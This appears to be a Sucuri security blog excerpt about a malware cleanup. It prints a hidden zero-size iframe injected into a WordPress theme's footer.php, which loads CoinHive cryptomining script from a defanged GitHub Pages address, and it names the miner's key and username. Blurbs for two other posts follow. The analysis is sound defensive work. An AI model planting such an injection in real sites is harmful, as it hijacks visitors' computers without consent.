Malicious Cryptominers from GitHub

less than 1 minute read

Malicious Cryptominers from GitHub<p>Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.</p>

Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:

<iframe src="hxxps://wpupdates.github[.]io/ping/" style="width:0;heigh:0;border:none;">

When we opened the URL in a browser, the page was blank.

After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key, CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username, MoneroU.

Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.

Spotlight on Women in Cybersecurity

less than 1 minute read

Sucuri is committed to helping women develop their careers in technology. On International Women’s Day, Sucuri team members share their insights into workin...

Hacked Website Trend Report – 2018

less than 1 minute read

We are proud to be releasing our latest Hacked Website Trend Report for 2018. This report is based on data collected and analyzed by the GoDaddy Security / ...